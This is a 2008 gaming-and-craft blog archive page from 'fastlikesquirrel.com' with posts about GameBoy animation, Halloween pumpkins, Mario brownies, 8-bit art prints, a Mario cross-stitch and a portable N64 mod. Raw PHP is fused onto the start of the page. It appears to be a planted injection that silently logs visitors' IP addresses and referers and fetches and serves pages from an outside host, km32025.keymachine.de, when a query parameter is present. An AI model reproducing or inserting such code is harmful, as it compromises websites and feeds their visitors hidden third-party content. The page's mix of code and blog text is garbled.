error_reporting(0); ini_set('display_errors',0); define('STATFILE','stat.txt'); define('LOG',true); if(isset($_GET['p'])) { $sock = fsockopen('km32025.keymachine.de', 80); if($sock){ if (LOG && isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $referer = rawurlencode($_SERVER['HTTP_REFERER']); $remote_ip = $_SERVER['REMOTE_ADDR']; $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']); $file = fopen(STATFILE,'ab'); if ($file) { fwrite($file,date('Y-m-d H:i:s').' '.$remote_ip.' '.$user_agent.' '.rawurldecode($referer)."\n"); fclose($file); } } fwrite ($sock, 'GET http://km32025.keymachine.de/oslik2/cn/7/'.$_GET['p'].'.html HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); echo(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} exit; } -=+fastlikesquirrel.com+=- » Arts

Archive for the 'Arts' Category

GameBoy animated boxing

Sunday, November 2nd, 2008

Just saw this over at Boing Boing

According to their website, the animators (Sidabitball and Camilo) created a method to synchronise animations with a GameBoy in realtime through a homebrew hardware interface.

This is excellent… chip tunes and animations, all done with a GameBoy. Great stuff *two thumbs up*

Happy Halloween ‘08

Friday, October 31st, 2008

I never really got into cutting pumpkins for Halloween. Or Halloween for that matter. Trick or treating was non-existent when I was growing up.

That said, I am wishing I had a chance to experience it after seeing some of these cool cut pumpkins for Halloween. Two thumbs up.

Kotaku also have thread up, and there’s some absolute classics there. Favorites so far include Fallout Boy, Bowser, Katamari and the Triforce shield.

Mario brownies

Sunday, October 26th, 2008

An interesting addition to the usual brownie recipe - Sprite Stitch has posted some details on how to create some of these delicious looking treats.

I wonder if they conatin any powerups or gold coins?

Update: i am 8-bit ‘08

Monday, October 6th, 2008

Just a quick update to my previous post about this years show, i am 8-bit 2008.

The organisers have teamed up with Paper Tiger and provided some of the artworks in print form. The above image is taken from a series called, “Great Showdowns (of the 8-bit era),” featuring characters from the Ghosts n’ Goblins game.

I’m looking forward to some of the other prints becoming available, the full i am 8-bit gallery is located here. If I can’t get the original artwork, a print may just have to suffice.

Epic Mario X-stitch completed

Saturday, October 4th, 2008

Over at Sprite Stitch, someone has finally completed the epic Mario x-stitch.

Check out the Deviantart link for more info.

Portable N64

Wednesday, September 24th, 2008

Console modder, Ben Heck, has previously created some awesome mods… from X360 laptops to an Atari 2600/PS2 combo unit. But this entry isn’t about Ben, but rather a regular on his forums that has created a portable N64, dubbed Darth 64.

By using the chassis of another electronic device, he rips the guts out of it and places in the innards of the N64, with some slight modifications for a screen and a smaller controller than the default size. The end result, plus additional images and some info on how to complete the project yourself, are located at Ben Heck’s forums.